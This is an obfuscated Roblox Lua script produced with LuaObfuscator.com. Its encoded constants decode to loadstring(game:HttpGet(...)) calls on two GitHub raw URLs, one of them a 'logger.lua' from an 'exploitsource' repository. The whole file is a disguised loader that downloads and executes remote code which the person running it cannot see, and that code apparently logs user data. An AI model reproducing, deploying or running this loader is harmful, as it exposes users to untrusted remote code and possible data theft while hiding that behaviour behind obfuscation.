--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v88=v5(v81,v19);v19=nil;return v88;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=0;local v83;while true do if (v82==(0 -(1637 -(1523 + 114)))) then v83=(v31/((5 -3)^(v32-(1 -0))))%((2 + 0)^(((v33-1) -(v32-(2 -(1 -0)))) + (620 -((1620 -(68 + 997)) + 64)))) ;return v83-(v83%(932 -(857 + (1344 -(226 + 1044))))) ;end end else local v84=568 -(367 + 201) ;local v85;while true do if (v84==(927 -(214 + (3104 -2391)))) then v85=2^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (877 -(282 + (712 -(32 + 85)))) ;end end end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(957 -(892 + (118 -53)))) then v35=v1(v16,v18,v18);v18=v18 + ((352 -(87 + 263)) -1) ;v34=1 -0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 ;return (v37 * (188 + 68)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + 1 ;return (v41 * (66680831 -49903615)) + (v40 * (66488 -((1454 -652) + 150))) + (v39 * (689 -433)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,998 -(915 + 82) ,56 -36 ) * ((2 + 0)^(41 -9))) + v42 ;local v46=v20(v43,1208 -(1069 + 118) ,31);local v47=((v20(v43,32)==(1 -0)) and  -(2 -1)) or ((439 -(145 + 293)) -(430 -(44 + 386))) ;if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * 0 ;else local v89=0 + 0 ;while true do if (v89==(791 -(368 + 423))) then v46=1487 -(998 + 488) ;v44=0;break;end end end elseif (v46==(6433 -4386)) then return ((v45==(18 -(10 + 8))) and (v47 * (1/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-((466 + 999) -(416 + 26)) ) * (v44 + (v45/((6 -4)^(23 + 24 + 5)))) ;end local function v25(v48)local v49=772 -(201 + 571) ;local v50;local v51;while true do if (v49==(1141 -(116 + (2517 -1495)))) then return v6(v51);end if (v49==0) then v50=nil;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=4 -3 ;end if (v49==2) then v51={};for v90=1 + 0 , #v50 do v51[v90]=v2(v1(v3(v50,v90,v90)));end v49=3;end if (v49==(3 -2)) then v50=v3(v16,v18,(v18 + v48) -((1 + 2) -2) );v18=v18 + v48 ;v49=861 -(814 + 45) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52~=(1 + 1)) then else v57=nil;v58=nil;v52=3;end if (v52==(2 + 1)) then v59=nil;v60=nil;v52=4 + 0 ;end if (v52~=(4 + 0)) then else while true do if (v53==(6 -3)) then v60=nil;while true do local v100=0 -0 ;while true do if (v100==(0 -0)) then if ((1 + 0)==v54) then local v101=0;while true do if (v101==2) then v54=2;break;end if (v101==(1 + 0)) then local v126=396 -(115 + 281) ;while true do if (v126~=0) then else for v165=2 -1 ,v59 do local v166=0 + 0 ;local v167;local v168;while true do if (v166==0) then local v171=0 -0 ;while true do if (v171==(0 -0)) then v167=v21();v168=nil;v171=1;end if ((868 -(550 + 317))~=v171) then else v166=1 -0 ;break;end end end if (v166~=(1 -0)) then else if (v167==1) then v168=v21()~=0 ;elseif (v167==(5 -3)) then v168=v24();elseif (v167~=3) then else v168=v25();end v60[v165]=v168;break;end end end v58[3]=v21();v126=1;end if (v126==(286 -(134 + 151))) then v101=1667 -(970 + 695) ;break;end end end if (v101~=0) then else v59=v23();v60={};v101=1 -0 ;end end end if (v54==(1992 -(582 + 1408))) then local v102=0;while true do if (0==v102) then for v138=1,v23() do local v139=0 -0 ;local v140;local v141;while true do if ((1 -0)==v139) then while true do if (0==v140) then v141=v21();if (v20(v141,3 -2 ,1)==(1824 -(1195 + 629))) then local v173=0;local v174;local v175;local v176;while true do if (v173==(2 -0)) then local v177=241 -(187 + 54) ;while true do if ((780 -(162 + 618))~=v177) then else local v184=0 + 0 ;while true do if (v184==(1 + 0)) then v177=1;break;end if (v184~=(0 -0)) then else if (v20(v175,1 -0 ,1 + 0 )==(1637 -(1373 + 263))) then v176[2]=v60[v176[2]];end if (v20(v175,1002 -(451 + 549) ,1 + 1 )~=(1 -0)) then else v176[3]=v60[v176[4 -1 ]];end v184=1385 -(746 + 638) ;end end end if ((1 + 0)~=v177) then else v173=3;break;end end end if ((4 -1)~=v173) then else if (v20(v175,344 -(218 + 123) ,3)==(1582 -(1535 + 46))) then v176[4 + 0 ]=v60[v176[4]];end v55[v138]=v176;break;end if (v173==0) then local v179=0;local v180;while true do if (v179==0) then v180=0 + 0 ;while true do if (v180==1) then v173=561 -(306 + 254) ;break;end if (v180==0) then local v188=0 + 0 ;while true do if (v188==(1 -0)) then v180=1468 -(899 + 568) ;break;end if (v188~=0) then else v174=v20(v141,2,3);v175=v20(v141,4,6);v188=1 + 0 ;end end end end break;end end end if (v173==(2 -1)) then local v181=0;while true do if (v181==0) then v176={v22(),v22(),nil,nil};if (v174==(572 -(426 + 146))) then local v185=0 + 0 ;local v186;local v187;while true do if ((1456 -(282 + 1174))~=v185) then else v186=811 -(569 + 242) ;v187=nil;v185=2 -1 ;end if (v185==(1 + 0)) then while true do if (v186~=(1024 -(706 + 318))) then else v187=1251 -(721 + 530) ;while true do if (v187==(1271 -(945 + 326))) then v176[7 -4 ]=v22();v176[4 + 0 ]=v22();break;end end break;end end break;end end elseif (v174==(701 -(271 + 429))) then v176[3 + 0 ]=v23();elseif (v174==(1502 -(1408 + 92))) then v176[3]=v23() -((1088 -(461 + 625))^16) ;elseif (v174~=3) then else local v195=0;local v196;local v197;while true do if (v195~=(1288 -(993 + 295))) then else v196=0;v197=nil;v195=1;end if (v195==1) then while true do if (v196~=0) then else v197=0;while true do if (v197~=(0 + 0)) then else v176[3]=v23() -((1173 -(418 + 753))^16) ;v176[2 + 2 ]=v22();break;end end break;end end break;end end end v181=1 + 0 ;end if (v181~=(1 + 0)) then else v173=2;break;end end end end end break;end end break;end if (v139~=(0 + 0)) then else v140=529 -(406 + 123) ;v141=nil;v139=1;end end end for v142=1,v23() do v56[v142-1 ]=v28();end v102=1;end if (v102==1) then return v58;end end end v100=1;end if (v100==(1770 -(1749 + 20))) then if (v54==(0 + 0)) then local v103=1322 -(1249 + 73) ;while true do if (v103==(1 + 0)) then v57={};v58={v55,v56,nil,v57};v103=5 -3 ;end if (v103~=0) then else v55={};v56={};v103=1901 -(106 + 1794) ;end if (v103==2) then v54=1 + 0 ;break;end end end break;end end end break;end if (v53==(1 + 0)) then local v98=0;while true do if (v98==(2 -1)) then v53=2;break;end if ((0 -0)==v98) then v56=nil;v57=nil;v98=1;end end end if (v53==(116 -(4 + 110))) then v58=nil;v59=nil;v53=587 -(57 + 527) ;end if (v53==0) then local v99=0;while true do if (v99~=1) then else v53=1;break;end if ((1427 -(41 + 1386))==v99) then v54=103 -(17 + 86) ;v55=nil;v99=1;end end end end break;end if ((0 + 0)==v52) then v53=0;v54=nil;v52=1;end if (v52~=(1 -0)) then else v55=nil;v56=nil;v52=5 -3 ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v87=0;while true do if (v87==1) then if (v80<=9) then if (v80<=4) then if (v80<=1) then if (v80>0) then v77[v79[2]]();else v77[v79[2]]=v63[v79[3]];end elseif (v80<=2) then v77[v79[2]]=v63[v79[3]];elseif (v80==3) then local v127=0;local v128;while true do if (v127==0) then v128=v79[2];v77[v128]=v77[v128](v13(v77,v128 + 1 ,v72));break;end end else do return;end end elseif (v80<=6) then if (v80>5) then local v108=0;local v109;local v110;local v111;local v112;while true do if (v108==1) then v72=(v111 + v109) -1 ;v112=0;v108=2;end if (v108==2) then for v159=v109,v72 do v112=v112 + 1 ;v77[v159]=v110[v112];end break;end if (v108==0) then v109=v79[2];v110,v111=v70(v77[v109](v13(v77,v109 + 1 ,v79[3])));v108=1;end end else v77[v79[2]]=v79[3];end elseif (v80<=7) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80>8) then for v145=v79[2],v79[3] do v77[v145]=nil;end else local v130=v79[2];local v131,v132=v70(v77[v130](v13(v77,v130 + 1 ,v79[3])));v72=(v132 + v130) -1 ;local v133=0;for v147=v130,v72 do local v148=0;while true do if (v148==0) then v133=v133 + 1 ;v77[v147]=v131[v133];break;end end end end elseif (v80<=14) then if (v80<=11) then if (v80==10) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else v71=v79[3];end elseif (v80<=12) then for v124=v79[2],v79[3] do v77[v124]=nil;end elseif (v80>13) then do return;end else v77[v79[2]]();end elseif (v80<=16) then if (v80==15) then local v116=0;local v117;local v118;while true do if (v116==0) then v117=v79[2];v118=v77[v79[3]];v116=1;end if (v116==1) then v77[v117 + 1 ]=v118;v77[v117]=v118[v79[4]];break;end end else local v119=0;local v120;local v121;while true do if (1==v119) then v77[v120 + 1 ]=v121;v77[v120]=v121[v79[4]];break;end if (v119==0) then v120=v79[2];v121=v77[v79[3]];v119=1;end end end elseif (v80<=17) then local v122=v79[2];v77[v122]=v77[v122](v13(v77,v122 + 1 ,v72));elseif (v80==18) then v71=v79[3];else v77[v79[2]]=v79[3];end v71=v71 + 1 ;break;end if (v87==0) then v79=v67[v71];v80=v79[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!063O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4172746875726B6C612F74657374652F6D61696E2F5669657468696E5363726970743203593O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6578706C6F6974736F757263652F476572616C2F6D61696E2F736F75726365732F46652O72616D656E7461732F6C6F2O6765722E6C7561001A3O0012053O00014O0009000100013O0026073O0002000100010004123O00020001001205000100013O00260700010005000100010004123O00050001001202000200023O001202000300033O00200F000300030004001205000500054O0006000300054O001100023O00022O0001000200010001001202000200023O001202000300033O00200F000300030004001205000500064O0006000300054O001100023O00022O00010002000100010004123O001900010004123O000500010004123O001900010004123O000200012O000E3O00017O00",v9(),...);
